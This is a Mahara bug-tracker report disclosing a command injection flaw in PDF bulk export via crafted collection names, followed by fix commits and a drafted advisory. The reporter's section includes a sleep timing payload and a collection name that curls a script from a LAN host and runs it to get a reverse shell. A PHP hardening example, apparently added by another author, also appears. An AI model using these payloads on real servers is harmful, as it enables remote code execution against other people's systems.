Command injection vulnerability when PDF bulk export is enabled

Bug #1942903 reported by Dominic
| Affects | Status       | Importance | Assigned to | Milestone |
|---------|--------------|------------|-------------|-----------|
| Mahara  | Fix Released | High       | Unassigned  |           |
| 20.04   | Fix Released | High       | Unassigned  |           |
| 20.10   | Fix Released | High       | Unassigned  |           |
| 21.04   | Fix Released | High       | Unassigned  |           |

Bug Description

Hi team, I hope you're doing well! When the experimental PDF export feature is enabled, a user can craft a malicious collection in Mahara and trigger the command injection issue when an admin exports the attacker's data (either specifically or by exporting the institution the attacker belongs to).

This was tested yesterday (2021-09-06) using the docker-compose file in the master branch of https://git.mahara.org/mahara/mahara/-/tree/master/docker

## Steps To Reproduce:

URLs below use `http://localhost:6142/mahara/` as that's my local instance's URL. Modify the base URL to fit your environment.

### Setup

1. Login as administrator
2. Go to the Plugin Administration page `http://localhost:6142/mahara/admin/extensions/plugins.php` and enable PDF at the bottom right of the page (installing some prerequisites on the server might be necessary, the plugins page should have instructions)

### Exploitation

1. As the attacker (normal user account), create a collection named `;sleep${IFS}100;`
2. As the administrator go to the bulk export page `http://localhost:6142/mahara/admin/users/bulkexport.php`
3. Choose `PDF files of pages and collections` as the export format
4. Set the attacker's username in `Usernames to export`
5. Click `Export Accounts` and observe the 100-second delay in processing

See the following section for a reverse shell example

## Details

The issue comes from https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/pdf/lib.php#L298

```php
$collectionname = $this->collections[$collectionid]->get('name');
$collectionname = parent::text_to_filename($collectionname); // the only sanitisation before exec()
if ($combiner == 'pdfunite') {
    exec('pdfunite ' . implode(' ', $collection) . ' ' . $pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf', $output);
}
```

`$collectionname` is user-controlled, and the sanitization allows just enough characters to be able to inject commands.

https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/html/lib.php#L372-L375

```php
public static function text_to_filename($text) {
    // truncates the text and replaces NOT allowed characters to hyphens
    // (; ` $ { } & and \ are not in the class and pass through unchanged)
    return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0, parent::MAX_FILENAME_LENGTH, 'utf-8'));
}
```

In the attached video the malicious collection name is

```bash
;cd$IFS`mktemp$IFS-d`;curl${IFS}192.168.1.75$IFS-o${IFS}a.sh;bash${IFS}a.sh;
```

and it triggered a reverse shell (see the attached video). Note that I had to install curl on my server to make it work, but that's likely to be present on a real system.

Suggested CVSS: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 8.0

`AC:H` because of the setting that's likely to be disabled, `PR:L` because the payload is injected as a regular user, `UI:R` as it's triggered by an admin export, `S:C` as it impacts everything on the server once a reverse shell is obtained.

Let me know if you need anything else!

Dominic
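As an added example (my own code, not Mahara's and not the project's actual fix), the following PHP reproduces the filter quoted in the report next to a hardened way to build the same `pdfunite` command line: an allowlist for the filename plus `escapeshellarg()` on every argument. `MAX_FILENAME_LENGTH`, the page paths and the collection id are assumed values for the demonstration, and `surviving_metachars()` is a helper of mine that reports which shell metacharacters pass the original filter, a quick way to audit any similar denylist that feeds `exec()`.

```php
<?php
// Added example, not Mahara's code and not the project's fix: the filter
// quoted from htdocs/export/html/lib.php next to a hardened version of the
// pdfunite command construction. Paths, ids and the length limit below are
// assumed values for the demonstration.

const MAX_FILENAME_LENGTH = 255; // assumed; Mahara's own constant is not shown in the report

// The original filter: only " ( ) * / : < > ? \ | and space are replaced.
// exec() hands the string to /bin/sh -c, so ';' still separates commands and
// ${IFS} substitutes whitespace, which is why stripping spaces does not help.
function text_to_filename_original(string $text): string {
    return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0, MAX_FILENAME_LENGTH, 'utf-8'));
}

// Builds the command string the same way the vulnerable exec() call does (not executed here).
function build_vulnerable_command(array $pages, string $pdfdirectory, int $collectionid, string $name): string {
    $collectionname = text_to_filename_original($name);
    return 'pdfunite ' . implode(' ', $pages) . ' ' . $pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf';
}

// Hardened filename: allowlist instead of denylist, and no leading '-' so the
// name can never be parsed as an option by the tool it is passed to.
function safe_filename(string $text): string {
    $text = mb_substr($text, 0, MAX_FILENAME_LENGTH, 'utf-8');
    $text = preg_replace('/[^A-Za-z0-9._-]+/', '-', $text);
    $text = trim($text, '.-');
    return $text === '' ? 'collection' : $text;
}

// Hardened command: every argument single-quoted with escapeshellarg(), so even
// a name that slipped past the allowlist would be passed as data, not parsed.
function build_safe_command(array $pages, string $pdfdirectory, int $collectionid, string $name): string {
    $args = array_map('escapeshellarg', $pages);
    $args[] = escapeshellarg($pdfdirectory . '/' . $collectionid . '_' . safe_filename($name) . '.pdf');
    return 'pdfunite ' . implode(' ', $args);
}

// Audit helper: which shell metacharacters survive the original filter for a given name?
function surviving_metachars(string $name): array {
    $filtered = text_to_filename_original($name);
    $meta = [';', '`', '$', '{', '}', '&', "'", '\\', "\n", '#', '!', '~'];
    return array_values(array_filter($meta, fn(string $c): bool => strpos($filtered, $c) !== false));
}

$pages = ['/tmp/export/7/page_1.pdf', '/tmp/export/7/page_2.pdf']; // assumed paths
$name  = ';sleep${IFS}100;';                                       // the payload from the report

echo "Surviving metacharacters: " . implode(' ', surviving_metachars($name)) . PHP_EOL;
echo "Vulnerable: " . build_vulnerable_command($pages, '/tmp/export/7', 7, $name) . PHP_EOL;
echo "Hardened:   " . build_safe_command($pages, '/tmp/export/7', 7, $name) . PHP_EOL;
```

Run it with `php example.php`; nothing is executed, the functions only return the command strings so the two constructions can be compared side by side. The point worth keeping is that filtering a filename is not a substitute for quoting: the output path is still built from user input, so both layers are used here, the allowlist to keep the filename sane and `escapeshellarg()` regardless.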

Revision history for this message
Dominic (dee-see) wrote :

I'm used to writing everything in Markdown, just for clarity: in step 1 of exploitation the backticks aren't part of the payload. The collection name is just ;sleep${IFS}100;

Dominic (dee-see)
description: updated
Robert Lyon (robertl-9)
Changed in mahara:
status: New → Confirmed
importance: Undecided → High
milestone: none → 21.10.0
Revision history for this message
Robert Lyon (robertl-9) wrote :

Have begun a security fix for this
https://reviews.mahara.org/#/c/12027/

It will be publicly available once reviewed

Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote :

Hi Dominic,

We will apply for a CVE number for this security issue and plan to release a fix for it with our next minor point updates that we expect by the end of October this year.

Thank you
Kristina

Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12126
Committed: https://git.mahara.org/mahara/mahara/commit/ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd
Submitter: Robert Lyon (<email address hidden>)
Branch: main

commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>

Revision history for this message
Mahara Bot (dev-mahara) wrote : A patch has been submitted for review

Patch for "21.10_DEV" branch: https://reviews.mahara.org/12202

Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12202
Committed: https://git.mahara.org/mahara/mahara/commit/79442bf3879049a5e49f4c1891bbd26570ac27a8
Submitter: Robert Lyon (<email address hidden>)
Branch: 21.10_DEV

commit 79442bf3879049a5e49f4c1891bbd26570ac27a8
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)

Revision history for this message
Mahara Bot (dev-mahara) wrote : A patch has been submitted for review

Patch for "21.04_STABLE" branch: https://reviews.mahara.org/12203

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Patch for "20.10_STABLE" branch: https://reviews.mahara.org/12204

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Patch for "20.04_STABLE" branch: https://reviews.mahara.org/12205

no longer affects: mahara/21.10
Robert Lyon (robertl-9)
information type: Private Security → Public Security
Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12205
Committed: https://git.mahara.org/mahara/mahara/commit/b30d4a821812fdb8fd533592dedc8911c6ecf5b5
Submitter: Robert Lyon (<email address hidden>)
Branch: 20.04_STABLE

commit b30d4a821812fdb8fd533592dedc8911c6ecf5b5
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Reviewed: https://reviews.mahara.org/12203
Committed: https://git.mahara.org/mahara/mahara/commit/7d94b9e9f87b1235d51f59f8db2d57caf7edd09b
Submitter: Gold (<email address hidden>)
Branch: 21.04_STABLE

commit 7d94b9e9f87b1235d51f59f8db2d57caf7edd09b
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)

Revision history for this message
Robert Lyon (robertl-9) wrote :

For the security forum post:

Vulnerability type: Code execution
Attack type: Local
Impact: Ability to gain privileges

Affected components: Exporting of collections with PDF export enabled
Attack vectors: If a person names a collection in a certain way then on exporting it can cause the name to be executed as a command.

Suggested description: In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exporting collections via PDF export could cause code execution.

Reported by: Dominic Couture
Bug report: https://bugs.launchpad.net/mahara/+bug/1942903
CVE reference: TBC

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Reviewed: https://reviews.mahara.org/12204
Committed: https://git.mahara.org/mahara/mahara/commit/6c15801d04887e482b1f490d8acf6f7c52661eea
Submitter: Robert Lyon (<email address hidden>)
Branch: 20.10_STABLE

commit 6c15801d04887e482b1f490d8acf6f7c52661eea
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)
